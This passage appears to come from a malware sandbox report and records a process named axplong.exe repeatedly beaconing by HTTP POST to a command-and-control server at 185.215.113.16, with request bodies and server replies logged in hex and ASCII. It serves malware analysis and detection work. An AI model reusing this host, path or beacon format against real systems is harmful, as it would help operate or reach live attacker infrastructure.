                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:20.510822058 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:20 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    17 | 192.168.2.6 | 56642 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:20.620178938 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:21.349457026 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:21 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:21.350250959 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:21.579701900 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:21 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    18 | 192.168.2.6 | 56644 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:21.698478937 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:22.420396090 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:22.421452045 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:22.650329113 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    19 | 192.168.2.6 | 56645 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:22.761904001 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:23.454515934 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:23 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:23.455425024 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:23.678189039 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:23 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    20 | 192.168.2.6 | 56646 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:23.792267084 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:24.494514942 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:24.495553017 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:24.722302914 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    21 | 192.168.2.6 | 56647 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:24.848995924 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:25.541349888 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:25 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:25.542232990 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:25.763559103 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:25 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    22 | 192.168.2.6 | 56648 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:25.901458979 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:26.600758076 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:26 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:26.601505995 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:26.828299999 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:26 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    23 | 192.168.2.6 | 56649 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:26.948230982 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:27.656364918 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:27 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:27.657565117 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:27.884694099 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:27 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    24 | 192.168.2.6 | 56650 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:27.997077942 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:28.705816984 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:28 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:28.706840992 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:28.935754061 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:28 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    25 | 192.168.2.6 | 56651 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:29.057605028 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:29.780584097 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:29 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:29.781574965 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:30.012847900 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:29 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    26 | 192.168.2.6 | 56652 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:30.120178938 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:30.805803061 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:30 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:30.806823969 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:31.028837919 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:30 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    27 | 192.168.2.6 | 56654 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:31.136713028 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:31.835589886 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:31 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:31.836463928 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:32.059149981 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:31 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    28 | 192.168.2.6 | 56655 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:32.167040110 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:32.899795055 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:32 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:32.900471926 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:33.136357069 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:33 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    29 | 192.168.2.6 | 56656 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:33.246207952 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:33.965270042 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:33 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:34.030082941 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:34.254512072 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:34 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    30 | 192.168.2.6 | 56657 | 185.215.113.16 | 80 | 4932 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 03:07:34.373275042 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:35.084661007 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:34 GMT
                    Content-Type: text/html; charset=UTF-8
